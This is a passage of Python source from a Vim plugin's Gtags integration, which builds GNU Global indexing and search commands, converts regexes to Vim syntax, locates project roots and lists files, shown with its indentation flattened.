if "--auto-jump" in arguments_dict:
auto_jump = True
else:
if "--current-buffer" in arguments_dict:
pattern_option = '-f "%s" -q' % vim.current.buffer.name
elif "--all-buffers" in arguments_dict:
pattern_option = '-f "%s" -q' % '" "'.join(b.name for b in vim.buffers)
else: # '--all' or empty means the whole project
pattern_option = None
root, dbpath, exists = self._root_dbpath(filename)
if not filename.startswith(root):
libdb = os.path.join(dbpath, "GTAGSLIBPATH")
if os.path.exists(libdb):
with lfOpen(libdb, 'r', errors='ignore') as f:
for line in f:
tmp_root, tmp_dbpath = line.rstrip().split('\t', 1)
if filename.startswith(tmp_root):
root = tmp_root
dbpath = tmp_dbpath
break
if "--result" in arguments_dict:
self._result_format = arguments_dict["--result"][0]
else:
self._result_format = "ctags"
env = os.environ
env["GTAGSROOT"] = root
env["GTAGSDBPATH"] = dbpath
if pattern_option is None: # '--all' or empty means the whole project
cmd = 'global -P | global -L- -f {}--gtagslabel={} {}--color=never --result={}'.format(
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, path_style, self._result_format)
else:
cmd = 'global {}--gtagslabel={} {} {}--color=never --result={}'.format(
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, pattern_option, path_style, self._result_format)
if not self._isDBModified(os.path.join(dbpath, 'GTAGS')) and self._content:
return self._content
executor = AsyncExecutor()
self._executor.append(executor)
lfCmd("let g:Lf_Debug_GtagsCmd = '%s'" % escQuote(cmd))
self._last_command = "--all"
content = executor.execute(cmd, env=env, raise_except=False)
return content
if "-S" in arguments_dict:
scope = "--scope %s " % os.path.abspath(arguments_dict["-S"][0])
else:
scope = ""
if "--literal" in arguments_dict:
literal = "--literal "
else:
literal = ""
if "-i" in arguments_dict:
ignorecase = "-i "
else:
ignorecase = ""
if "--append" not in arguments_dict or self._last_result_format is not None:
self._pattern_regex = []
# build vim regex, which is used for highlighting
if ignorecase:
case_pattern = r'\c'
else:
case_pattern = r'\C'
if len(pattern) > 1 and (pattern[0] == pattern[-1] == '"' or pattern[0] == pattern[-1] == "'"):
p = pattern[1:-1]
else:
p = pattern
if literal:
if len(pattern) > 1 and pattern[0] == pattern[-1] == '"':
p = re.sub(r'\\(?!")', r'\\\\', p)
else:
p = p.replace('\\', r'\\')
self._pattern_regex.append(r'\V' + case_pattern + p)
else:
if "-g" not in arguments_dict:
vim_regex = self.translateRegex(case_pattern + p.join([r'\b', r'\b']))
vim_regex = vim_regex.replace('.', r'\w')
else:
vim_regex = self.translateRegex(case_pattern + p)
self._pattern_regex.append(vim_regex)
root, dbpath, exists = self._root_dbpath(filename)
env = os.environ
env["GTAGSROOT"] = root
env["GTAGSDBPATH"] = dbpath
cmd = 'global {}--gtagslabel={} {} {}{}{}{}--color=never --result=ctags-mod'.format(
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, pattern_option, path_style, scope, literal, ignorecase)
executor = AsyncExecutor()
self._executor.append(executor)
lfCmd("let g:Lf_Debug_GtagsCmd = '%s'" % escQuote(cmd))
self._last_command = "others"
content = executor.execute(cmd, env=env)
libdb = os.path.join(dbpath, "GTAGSLIBPATH")
if os.path.exists(libdb):
with lfOpen(libdb, 'r', errors='ignore') as f:
for line in f:
root, dbpath = line.rstrip().split('\t', 1)
env = os.environ
env["GTAGSROOT"] = root
env["GTAGSDBPATH"] = dbpath
if path_style == "--path-style abslib ":
path_style = "--path-style absolute "
cmd = 'global {}--gtagslabel={} {} {}{}{}{}--color=never --result=ctags-mod -q'.format(
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, pattern_option, path_style, scope, literal, ignorecase)
executor = AsyncExecutor()
self._executor.append(executor)
content += executor.execute(cmd, env=env)
if auto_jump:
first_two = list(itertools.islice(content, 2))
if len(first_two) == 1:
return first_two
else:
return content.join_left(first_two)
return content
def translateRegex(self, regex, is_perl=False):
"""
copied from RgExplorer
"""
vim_regex = regex
vim_regex = re.sub(r'([%@&])', r'\\\1', vim_regex)
# non-greedy pattern
vim_regex = re.sub(r'(?<!\\)\*\?', r'{-}', vim_regex)
vim_regex = re.sub(r'(?<!\\)\+\?', r'{-1,}', vim_regex)
vim_regex = re.sub(r'(?<!\\)\?\?', r'{-0,1}', vim_regex)
vim_regex = re.sub(r'(?<!\\)\{(.*?)\}\?', r'{-\1}', vim_regex)
if is_perl:
# *+, ++, ?+, {m,n}+ => *, +, ?, {m,n}
vim_regex = re.sub(r'(?<!\\)([*+?}])\+', r'\1', vim_regex)
# remove (?#....)
vim_regex = re.sub(r'\(\?#.*?\)', r'', vim_regex)
# (?=atom) => atom\@=
vim_regex = re.sub(r'\(\?=(.+?)\)', r'(\1)@=', vim_regex)
# (?!atom) => atom\@!
vim_regex = re.sub(r'\(\?!(.+?)\)', r'(\1)@!', vim_regex)
# (?<=atom) => atom\@<=
vim_regex = re.sub(r'\(\?<=(.+?)\)', r'(\1)@<=', vim_regex)
# (?<!atom) => atom\@<!
vim_regex = re.sub(r'\(\?<!(.+?)\)', r'(\1)@<!', vim_regex)
# (?>atom) => atom\@>
vim_regex = re.sub(r'\(\?>(.+?)\)', r'(\1)@>', vim_regex)
# this won't hurt although they are not the same
vim_regex = vim_regex.replace(r'\A', r'^')
vim_regex = vim_regex.replace(r'\z', r'$')
vim_regex = vim_regex.replace(r'\B', r'')
# word boundary
vim_regex = re.sub(r'\\b', r'(<|>)', vim_regex)
# case-insensitive
vim_regex = vim_regex.replace(r'(?i)', r'\c')
vim_regex = vim_regex.replace(r'(?-i)', r'\C')
# (?P<name>exp) => (exp)
vim_regex = re.sub(r'(?<=\()\?P<\w+>', r'', vim_regex)
# (?:exp) => %(exp)
vim_regex = re.sub(r'\(\?:(.+?)\)', r'%(\1)', vim_regex)
# \a bell (\x07)
# \f form feed (\x0C)
# \v vertical tab (\x0B)
vim_regex = vim_regex.replace(r'\a', r'%x07')
vim_regex = vim_regex.replace(r'\f', r'%x0C')
vim_regex = vim_regex.replace(r'\v', r'%x0B')
# \123 octal character code (up to three digits) (when enabled)
# \x7F hex character code (exactly two digits)
vim_regex = re.sub(r'\\(x[0-9A-Fa-f][0-9A-Fa-f])', r'%\1', vim_regex)
# \x{10FFFF} any hex character code corresponding to a Unicode code point
# \u007F hex character code (exactly four digits)
# \u{7F} any hex character code corresponding to a Unicode code point
# \U0000007F hex character code (exactly eight digits)
# \U{7F} any hex character code corresponding to a Unicode code point
vim_regex = re.sub(r'\\([uU])', r'%\1', vim_regex)
vim_regex = re.sub(r'\[\[:ascii:\]\]', r'[\\x00-\\x7F]', vim_regex)
vim_regex = re.sub(r'\[\[:word:\]\]', r'[0-9A-Za-z_]', vim_regex)
vim_regex = vim_regex.replace(r'[[:^alnum:]]', r'[^0-9A-Za-z]')
vim_regex = vim_regex.replace(r'[[:^alpha:]]', r'[^A-Za-z]')
vim_regex = vim_regex.replace(r'[[:^ascii:]]', r'[^\x00-\x7F]')
vim_regex = vim_regex.replace(r'[[:^blank:]]', r'[^\t ]')
vim_regex = vim_regex.replace(r'[[:^cntrl:]]', r'[^\x00-\x1F\x7F]')
vim_regex = vim_regex.replace(r'[[:^digit:]]', r'[^0-9]')
vim_regex = vim_regex.replace(r'[[:^graph:]]', r'[^!-~]')
vim_regex = vim_regex.replace(r'[[:^lower:]]', r'[^a-z]')
vim_regex = vim_regex.replace(r'[[:^print:]]', r'[^ -~]')
vim_regex = vim_regex.replace(r'[[:^punct:]]', r'[^!-/:-@\[-`{-~]')
vim_regex = vim_regex.replace(r'[[:^space:]]', r'[^\t\n\r ]')
vim_regex = vim_regex.replace(r'[[:^upper:]]', r'[^A-Z]')
vim_regex = vim_regex.replace(r'[[:^word:]]', r'[^0-9A-Za-z_]')
vim_regex = vim_regex.replace(r'[[:^xdigit:]]', r'[^0-9A-Fa-f]')
return r'\v' + vim_regex
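    # Two worked examples of the translation above (assumed inputs, traced through the
    # substitutions in translateRegex):
    #   translateRegex(r'(?i)foo+?')        ->  r'\v\cfoo{-1,}'
    #   translateRegex(r'(?P<name>\w+)\b')  ->  r'\v(\w+)(<|>)'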
def _nearestAncestor(self, markers, path):
"""
        return the nearest ancestor path (including itself) of `path` that contains
        one of the files or directories in `markers`.
`markers` is a list of file or directory names.
"""
if os.name == 'nt':
# e.g. C:\\
root = os.path.splitdrive(os.path.abspath(path))[0] + os.sep
else:
root = '/'
path = os.path.abspath(path)
while path != root:
for name in markers:
if os.path.exists(os.path.join(path, name)):
return path
path = os.path.abspath(os.path.join(path, ".."))
for name in markers:
if os.path.exists(os.path.join(path, name)):
return path
return ""
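    # For example (hypothetical layout): with markers ['.git', '.hg'] and path
    # '/home/user/project/src', this returns '/home/user/project' when
    # '/home/user/project/.git' exists, and '' when no ancestor contains a marker.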
def _isVersionControl(self, filename):
if self._project_root and filename.startswith(self._project_root):
return True
ancestor = self._nearestAncestor(self._root_markers, os.path.dirname(filename))
if ancestor:
self._project_root = ancestor
return True
else:
return False
def _generateDbpath(self, path):
if os.name == 'nt':
db_folder = re.sub(r'[\\/]', '_', path.replace(':\\', '_', 1))
else:
db_folder = path.replace('/', '_')
if self._store_in_project:
return path
elif self._store_in_rootmarker:
for name in self._root_markers:
if os.path.exists(os.path.join(path, name)):
return os.path.join(path, name, '.LfGtags')
# if not exist root marker, store in project
return os.path.join(path, '.LfGtags')
else:
return os.path.join(self._db_location, db_folder)
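    # Example of the default mapping (assuming neither g:Lf_GtagsStoreInProject nor
    # g:Lf_GtagsStoreInRootMarker is set): '/home/user/project' is stored under
    # '<g:Lf_CacheDirectory>/.LfCache/gtags/_home_user_project'.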
def _root_dbpath(self, filename):
"""
return the (root, dbpath, whether gtags exists)
"""
if self._project_root and filename.startswith(self._project_root):
root = self._project_root
else:
ancestor = self._nearestAncestor(self._root_markers, os.path.dirname(filename))
if ancestor:
self._project_root = ancestor
root = self._project_root
else:
ancestor = self._nearestAncestor(self._root_markers, os.getcwd())
if ancestor:
self._project_root = ancestor
root = self._project_root
else:
root = os.getcwd()
dbpath = self._generateDbpath(root)
return (root, dbpath, os.path.exists(os.path.join(dbpath, "GTAGS")))
def updateGtags(self, filename, single_update, auto):
self._task_queue.put(partial(self._update, filename, single_update, auto))
def _isDBModified(self, dbpath):
try:
if self._db_timestamp == os.path.getmtime(dbpath):
return False
else:
self._db_timestamp = os.path.getmtime(dbpath)
return True
except:
return True
def _remove(self, filename):
if filename == "":
return
root, dbpath, exists = self._root_dbpath(filename)
try:
lfCmd("echohl Question")
if self._store_in_project:
if lfEval('input("Are you sure you want to remove GTAGS files?[Ny] ")') in ["Y","y"]:
os.remove(os.path.join(dbpath, "GTAGS"))
os.remove(os.path.join(dbpath, "GPATH"))
os.remove(os.path.join(dbpath, "GRTAGS"))
if os.path.exists(os.path.join(dbpath, "GTAGSLIBPATH")):
os.remove(os.path.join(dbpath, "GTAGSLIBPATH"))
elif lfEval('input("Are you sure you want to remove directory `{}`?[Ny] ")'.format(lfEncode(dbpath.replace('\\', r'\\')))) in ["Y","y"]:
shutil.rmtree(dbpath)
lfCmd("redraw | echo 'Done!'")
except Exception as e:
lfPrintError(e)
finally:
lfCmd("echohl NONE")
def _update(self, filename, single_update, auto):
if filename == "":
return
if self._gtagsconf == '' and os.name == 'nt':
self._gtagsconf = os.path.normpath(os.path.join(self._which("gtags.exe"), "..", "share", "gtags", "gtags.conf")).join('""')
root, dbpath, exists = self._root_dbpath(filename)
if not filename.startswith(root):
# if self._has_nvim:
# vim.async_call(lfCmd, "let g:Lf_Debug_Gtags = '%s'" % escQuote(str((filename, root))))
# else:
# lfCmd("let g:Lf_Debug_Gtags = '%s'" % escQuote(str((filename, root))))
return
self._updateLibGtags(root, dbpath)
if single_update:
if exists:
cmd = 'cd {}"{}" && gtags {}{}{}{}--gtagslabel {} --single-update "{}" "{}"'.format(self._cd_option, root,
self._accept_dotfiles, self._skip_unreadable, self._skip_symlink,
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, filename, dbpath)
env = os.environ
# env["GTAGSFORCECPP"] = "" # lead to issue #489
subprocess.Popen(cmd, shell=True, env=env)
elif not auto:
self._executeCmd(root, dbpath)
elif self._isVersionControl(filename):
if not exists:
self._executeCmd(root, dbpath)
def _updateLibGtags(self, root, dbpath):
if not self._gtagslibpath:
return
if not os.path.exists(dbpath):
os.makedirs(dbpath)
libpaths = ["%s\t%s\n" % (p, self._generateDbpath(p)) for p in self._gtagslibpath if os.path.exists(p) and p != root]
if libpaths:
libdb = os.path.join(dbpath, "GTAGSLIBPATH")
with lfOpen(libdb, 'w', errors='ignore') as f:
f.writelines(libpaths)
if self._gtagsconf == '' and os.name == 'nt':
self._gtagsconf = os.path.normpath(os.path.join(self._which("gtags.exe"), "..", "share", "gtags", "gtags.conf")).join('""')
env = os.environ
# env["GTAGSFORCECPP"] = "" # lead to issue #489
for path in self._gtagslibpath:
if not os.path.exists(path):
continue
libdbpath = self._generateDbpath(path)
if not os.path.exists(libdbpath):
os.makedirs(libdbpath)
cmd = 'cd {}"{}" && gtags -i {}{}{}{}--gtagslabel {} "{}"'.format(self._cd_option, path,
self._accept_dotfiles, self._skip_unreadable, self._skip_symlink,
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, libdbpath)
subprocess.Popen(cmd, shell=True, env=env)
def _which(self, executable):
for p in os.environ["PATH"].split(";"):
if os.path.exists(os.path.join(p, executable)):
return p
return ""
def _evalVimVar(self):
"""
        Vim variables cannot be accessed from a Python thread,
        so we evaluate the values in advance.
"""
self._accept_dotfiles = "--accept-dotfiles " if lfEval("get(g:, 'Lf_GtagsAcceptDotfiles', '0')") == '1' else ""
self._skip_unreadable = "--skip-unreadable " if lfEval("get(g:, 'Lf_GtagsSkipUnreadable', '0')") == '1' else ""
self._skip_symlink = "--skip-symlink%s " % ('=' + lfEval("get(g:, 'Lf_GtagsSkipSymlink', '')")
if lfEval("get(g:, 'Lf_GtagsSkipSymlink', '')") != '' else "")
self._gtagsconf = lfEval("get(g:, 'Lf_Gtagsconf', '')")
if self._gtagsconf:
self._gtagsconf = self._gtagsconf.join('""')
self._gtagslabel = lfEval("get(g:, 'Lf_Gtagslabel', 'default')")
self._Lf_GtagsSource = int(lfEval("get(g:, 'Lf_GtagsSource', 0)"))
if self._Lf_GtagsSource not in [0, 1, 2]:
self._Lf_GtagsSource = 0
if self._Lf_GtagsSource != 1: # only using FileExplorer needs to evaluate the following variables
if self._Lf_GtagsSource == 2:
self._Lf_GtagsfilesCmd = lfEval("g:Lf_GtagsfilesCmd")
return
if lfEval("exists('g:Lf_ExternalCommand')") == '1':
self._Lf_ExternalCommand = lfEval("g:Lf_ExternalCommand")
return
else:
self._Lf_ExternalCommand = None
self._Lf_UseVersionControlTool = lfEval("g:Lf_UseVersionControlTool") == '1'
self._Lf_WildIgnore = lfEval("g:Lf_WildIgnore")
self._Lf_RecurseSubmodules = lfEval("get(g:, 'Lf_RecurseSubmodules', 0)") == '1'
if lfEval("exists('g:Lf_DefaultExternalTool')") == '1':
self._default_tool = {"rg": 0, "pt": 0, "ag": 0, "find": 0}
tool = lfEval("g:Lf_DefaultExternalTool")
if tool and lfEval("executable('%s')" % tool) == '0':
raise Exception("executable '%s' can not be found!" % tool)
self._default_tool[tool] = 1
else:
self._default_tool = {"rg": 1, "pt": 1, "ag": 1, "find": 1}
self._is_rg_executable = lfEval("executable('rg')") == '1'
self._Lf_ShowHidden = lfEval("g:Lf_ShowHidden") != '0'
self._Lf_FollowLinks = lfEval("g:Lf_FollowLinks") == '1'
self._is_pt_executable = lfEval("executable('pt')") == '1'
self._is_ag_executable = lfEval("executable('ag')") == '1'
self._is_find_executable = lfEval("executable('find')") == '1'
def _exists(self, path, dir):
"""
return True if `dir` exists in `path` or its ancestor path,
otherwise return False
"""
if os.name == 'nt':
# e.g. C:\\
root = os.path.splitdrive(os.path.abspath(path))[0] + os.sep
else:
root = '/'
while os.path.abspath(path) != root:
cur_dir = os.path.join(path, dir)
if os.path.exists(cur_dir) and os.path.isdir(cur_dir):
return True
path = os.path.join(path, "..")
cur_dir = os.path.join(path, dir)
if os.path.exists(cur_dir) and os.path.isdir(cur_dir):
return True
return False
def _buildCmd(self, dir, **kwargs):
"""
this function comes from FileExplorer
"""
# do not use external command if the encoding of `dir` is not ascii
if not isAscii(dir):
return None
if self._Lf_ExternalCommand:
return self._Lf_ExternalCommand.replace('"%s"', '%s') % dir.join('""')
arguments_dict = kwargs.get("arguments", {})
if self._Lf_UseVersionControlTool:
if self._exists(dir, ".git"):
wildignore = self._Lf_WildIgnore
if ".git" in wildignore.get("dir", []):
wildignore.get("dir", []).remove(".git")
if ".git" in wildignore.get("file", []):
wildignore.get("file", []).remove(".git")
ignore = ""
for i in wildignore.get("dir", []):
ignore += ' -x "%s"' % i
for i in wildignore.get("file", []):
ignore += ' -x "%s"' % i
if "--no-ignore" in arguments_dict:
no_ignore = ""
else:
no_ignore = "--exclude-standard"
if self._Lf_RecurseSubmodules:
recurse_submodules = "--recurse-submodules"
else:
recurse_submodules = ""
cmd = 'git ls-files %s "%s" && git ls-files --others %s %s "%s"' % (recurse_submodules, dir, no_ignore, ignore, dir)
return cmd
elif self._exists(dir, ".hg"):
wildignore = self._Lf_WildIgnore
if ".hg" in wildignore.get("dir", []):
wildignore.get("dir", []).remove(".hg")
if ".hg" in wildignore.get("file", []):
wildignore.get("file", []).remove(".hg")
ignore = ""
for i in wildignore.get("dir", []):
ignore += ' -X "%s"' % self._expandGlob("dir", i)
for i in wildignore.get("file", []):
ignore += ' -X "%s"' % self._expandGlob("file", i)
cmd = 'hg files %s "%s"' % (ignore, dir)
return cmd
default_tool = self._default_tool
if default_tool["rg"] and self._is_rg_executable:
wildignore = self._Lf_WildIgnore
if os.name == 'nt': # https://github.com/BurntSushi/ripgrep/issues/500
color = ""
ignore = ""
for i in wildignore.get("dir", []):
if self._Lf_ShowHidden or not i.startswith('.'): # rg does not show hidden files by default
ignore += ' -g "!%s"' % i
for i in wildignore.get("file", []):
if self._Lf_ShowHidden or not i.startswith('.'):
ignore += ' -g "!%s"' % i
else:
color = "--color never"
ignore = ""
for i in wildignore.get("dir", []):
if self._Lf_ShowHidden or not i.startswith('.'):
ignore += " -g '!%s'" % i
for i in wildignore.get("file", []):
if self._Lf_ShowHidden or not i.startswith('.'):
ignore += " -g '!%s'" % i
if self._Lf_FollowLinks:
followlinks = "-L"
else:
followlinks = ""
if self._Lf_ShowHidden:
show_hidden = "--hidden"
else:
show_hidden = ""
if "--no-ignore" in arguments_dict:
no_ignore = "--no-ignore"
else:
no_ignore = ""
if dir == '.':
cur_dir = ''
else:
cur_dir = '"%s"' % dir
cmd = 'rg --no-messages --files %s %s %s %s %s %s' % (color, ignore, followlinks, show_hidden, no_ignore, cur_dir)
elif default_tool["pt"] and self._is_pt_executable and os.name != 'nt': # there is bug on Windows
wildignore = self._Lf_WildIgnore
ignore = ""
for i in wildignore.get("dir", []):
if self._Lf_ShowHidden or not i.startswith('.'): # pt does not show hidden files by default
ignore += " --ignore=%s" % i
for i in wildignore.get("file", []):
if self._Lf_ShowHidden or not i.startswith('.'):
ignore += " --ignore=%s" % i
if self._Lf_FollowLinks:
followlinks = "-f"
else:
followlinks = ""
if self._Lf_ShowHidden:
show_hidden = "--hidden"
else:
show_hidden = ""
if "--no-ignore" in arguments_dict:
no_ignore = "-U"
else:
no_ignore = ""
cmd = 'pt --nocolor %s %s %s %s -g="" "%s"' % (ignore, followlinks, show_hidden, no_ignore, dir)
elif default_tool["ag"] and self._is_ag_executable and os.name != 'nt': # https://github.com/vim/vim/issues/3236
wildignore = self._Lf_WildIgnore
ignore = ""
for i in wildignore.get("dir", []):
if self._Lf_ShowHidden or not i.startswith('.'): # ag does not show hidden files by default
ignore += ' --ignore "%s"' % i
for i in wildignore.get("file", []):
if self._Lf_ShowHidden or not i.startswith('.'):
ignore += ' --ignore "%s"' % i
if self._Lf_FollowLinks:
followlinks = "-f"
else:
followlinks = ""
if self._Lf_ShowHidden:
show_hidden = "--hidden"
else:
show_hidden = ""
if "--no-ignore" in arguments_dict:
no_ignore = "-U"
else:
no_ignore = ""
cmd = 'ag --nocolor --silent %s %s %s %s -g "" "%s"' % (ignore, followlinks, show_hidden, no_ignore, dir)
elif default_tool["find"] and self._is_find_executable and os.name != 'nt':
wildignore = self._Lf_WildIgnore
ignore_dir = ""
for d in wildignore.get("dir", []):
ignore_dir += '-type d -name "%s" -prune -o ' % d
ignore_file = ""
for f in wildignore.get("file", []):
ignore_file += '-type f -name "%s" -o ' % f
if self._Lf_FollowLinks:
followlinks = "-L"
else:
followlinks = ""
if os.name == 'nt':
redir_err = ""
else:
redir_err = " 2>/dev/null"
if self._Lf_ShowHidden:
show_hidden = ""
else:
show_hidden = '-name ".*" -prune -o'
cmd = 'find %s "%s" -name "." -o %s %s %s -type f -print %s %s' % (followlinks,
dir,
ignore_dir,
ignore_file,
show_hidden,
redir_err)
else:
cmd = None
return cmd
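    # For instance (assumed settings: no g:Lf_ExternalCommand, no VCS checkout detected,
    # rg on PATH, empty wildignore and no extra options), _buildCmd('.') produces roughly:
    #   rg --no-messages --files --color never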
def _file_list_cmd(self, root):
if self._Lf_GtagsSource == 1:
cmd = self._buildCmd(root)
elif self._Lf_GtagsSource == 2:
if os.path.exists(os.path.join(root, ".git")) and os.path.isdir(os.path.join(root, ".git")):
cmd = self._Lf_GtagsfilesCmd[".git"]
elif os.path.exists(os.path.join(root, ".hg")) and os.path.isdir(os.path.join(root, ".hg")):
cmd = self._Lf_GtagsfilesCmd[".hg"]
else:
cmd = self._Lf_GtagsfilesCmd["default"]
else:
cmd = None
return cmd
def _executeCmd(self, root, dbpath):
if not os.path.exists(dbpath):
os.makedirs(dbpath)
cmd = self._file_list_cmd(root)
if cmd:
if os.name == 'nt':
cmd = 'cd {}"{}" && ( {} ) | gtags -i {}{}{}{}--gtagslabel {} -f- "{}"'.format(self._cd_option, root, cmd,
self._accept_dotfiles, self._skip_unreadable, self._skip_symlink,
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, dbpath)
else:
cmd = 'cd {}"{}" && {{ {}; }} | gtags -i {}{}{}{}--gtagslabel {} -f- "{}"'.format(self._cd_option, root, cmd,
self._accept_dotfiles, self._skip_unreadable, self._skip_symlink,
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, dbpath)
else:
cmd = 'cd {}"{}" && gtags -i {}{}{}{}--gtagslabel {} "{}"'.format(self._cd_option, root,
self._accept_dotfiles, self._skip_unreadable, self._skip_symlink,
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, dbpath)
env = os.environ
# env["GTAGSFORCECPP"] = "" # lead to issue #489
proc = subprocess.Popen(cmd, shell=True, universal_newlines=True, stderr=subprocess.PIPE, env=env)
_, error = proc.communicate()
def print_log(args):
print(args)
if error:
if self._has_nvim:
vim.async_call(print_log, cmd)
vim.async_call(print_log, error)
vim.async_call(print_log, "gtags error!")
else:
print(cmd)
print(error)
print("gtags error!")
else:
if self._has_nvim:
vim.async_call(print_log, "gtags generated successfully!")
else:
print("gtags generated successfully!")
if self._has_nvim:
vim.async_call(lfCmd, "let g:Lf_Debug_GtagsCmd = '%s'" % escQuote(cmd))
# else:
# lfCmd("let g:Lf_Debug_GtagsCmd = '%s'" % escQuote(cmd)) # may cause crash
def getStlCategory(self):
return 'Gtags'
def getStlCurDir(self):
return escQuote(lfEncode(os.getcwd()))
def cleanup(self):
for exe in self._executor:
exe.killProcess()
self._executor = []
def getPatternRegex(self):
return self._pattern_regex
def getResultFormat(self):
return self._result_format
def getLastResultFormat(self):
return self._last_result_format
#*****************************************************
# GtagsExplManager
#*****************************************************
class GtagsExplManager(Manager):
def __init__(self):
super(GtagsExplManager, self).__init__()
self._match_path = False
def _getExplClass(self):
return GtagsExplorer
def _defineMaps(self):
lfCmd("call leaderf#Gtags#Maps()")
def _acceptSelection(self, *args, **kwargs):
if len(args) == 0:
return
line = args[0]
if self._getExplorer().getResultFormat() is None:
file, line_num = line.split('\t', 2)[:2]
elif self._getExplorer().getResultFormat() == "ctags":
file, line_num = line.split('\t', 2)[1:]
elif self._getExplorer().getResultFormat() == "ctags-x":
line_num, file = line.split(None, 3)[1:3]
else: # ctags-mod
file, line_num = line.split('\t', 2)[:2]
if not os.path.isabs(file):
file = os.path.join(self._getInstance().getCwd(), lfDecode(file))
file = os.path.normpath(lfEncode(file))
try:
if kwargs.get("mode", '') == 't':
if lfEval("get(g:, 'Lf_JumpToExistingWindow', 1)") == '1':
                    lfCmd("tab drop %s | %s" % (escSpecial(file), line_num))
                else:
                    lfCmd("tabe %s | %s" % (escSpecial(file), line_num))
else:
if lfEval("get(g:, 'Lf_JumpToExistingWindow', 1)") == '1' and lfEval("bufexists('%s')" % escQuote(file)) == '1':
lfCmd("keepj hide drop %s | %s" % (escSpecial(file), line_num))
else:
lfCmd("hide edit +%s %s" % (line_num, escSpecial(file)))
lfCmd("norm! ^zv")
lfCmd("norm! zz")
if vim.current.window not in self._cursorline_dict:
self._cursorline_dict[vim.current.window] = vim.current.window.options["cursorline"]
lfCmd("setlocal cursorline")
except vim.error as e:
lfPrintError(e)
def updateGtags(self, filename, single_update, auto=True):
self._getExplorer().updateGtags(filename, single_update, auto)
def setArguments(self, arguments):
self._arguments = arguments
self._match_path = "--match-path" in arguments
def _getDigest(self, line, mode):
"""
specify what part in the line to be processed and highlighted
Args:
mode: 0, return the full path
1, return the name only
2, return the directory name
"""
if self._getExplorer().getResultFormat() in [None, "ctags-mod"]:
if self._match_path:
return line
if mode == 2:
return line[:line.find('\t')]
else:
                return line[line.find('\t', line.find('\t') + 1) + 1:]
elif self._getExplorer().getResultFormat() == "ctags":
if mode == 2:
return line[line.find('\t')+1:]
else:
return line[:line.find('\t')]
elif self._getExplorer().getResultFormat() == "ctags-x":
if mode == 2:
return line[line.find(' ') + 1:]
else:
return line[:line.find(' ')]
else:
return line
def _getDigestStartPos(self, line, mode):
"""
return the start position of the digest returned by _getDigest()
Args:
            mode: 0, return the start position of full path
                  1, return the start position of name only
                  2, return the start position of directory name
"""
if self._getExplorer().getResultFormat() in [None, "ctags-mod"]:
if self._match_path or mode == 2:
return 0
            return lfBytesLen(line[:line.find('\t', line.find('\t') + 1)]) + 1
elif self._getExplorer().getResultFormat() == "ctags":
if mode == 2:
return lfBytesLen(line[:line.find('\t')]) + 1
else:
return 0
elif self._getExplorer().getResultFormat() == "ctags-x":
if mode == 2:
return lfBytesLen(line[:line.find(' ')]) + 1
else:
return 0
else:
return 0
def _createHelp(self):
help = []
help.append('" <CR>/<double-click>/o : open file under cursor')
help.append('" x : open file under cursor in a horizontally split window')
help.append('" v : open file under cursor in a vertically split window')
help.append('" t : open file under cursor in a new tabpage')
help.append('" p : preview the result')
help.append('" d : delete the line under the cursor')
help.append('" i/<Tab> : switch to input mode')
help.append('" q : quit')
help.append('" <F1> : toggle this help')
help.append('" ---------------------------------------------------------')
return help
def _afterEnter(self):
super(GtagsExplManager, self)._afterEnter()
lfCmd("augroup Lf_Gtags")
lfCmd("autocmd!")
lfCmd("autocmd VimLeavePre * call leaderf#Gtags#cleanup()")
lfCmd("augroup END")
if self._getInstance().getWinPos() == 'popup':
if self._getExplorer().getResultFormat() is None:
# \ should be escaped as \\\\
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsFileName', '^.\\\\{-}\\\\ze\\\\t')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsLineNumber', '\\\\t\\\\zs\\\\d\\\\+\\\\ze\\\\t')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
elif self._getExplorer().getResultFormat() == "ctags":
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsFileName', '\\\\t\\\\zs.\\\\{-}\\\\ze\\\\t')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsLineNumber', '\\\\t\\\\zs\\\\d\\\\+$')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
elif self._getExplorer().getResultFormat() == "ctags-x":
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsFileName', '^\\\\S\\\\+\\\\s\\\\+\\\\d\\\\+\\\\s\\\\+\\\\zs\\\\S\\\\+')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsLineNumber', '^\\\\S\\\\+\\\\s\\\\+\\\\zs\\\\d\\\\+')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
else: # ctags-mod
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsFileName', '^.\\\\{-}\\\\ze\\\\t')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsLineNumber', '\\\\t\\\\zs\\\\d\\\\+\\\\ze\\\\t')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
try:
for i in self._getExplorer().getPatternRegex():
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsHighlight', '%s', 9)")"""
% (self._getInstance().getPopupWinId(), escQuote(i).replace('\\', '\\\\')))
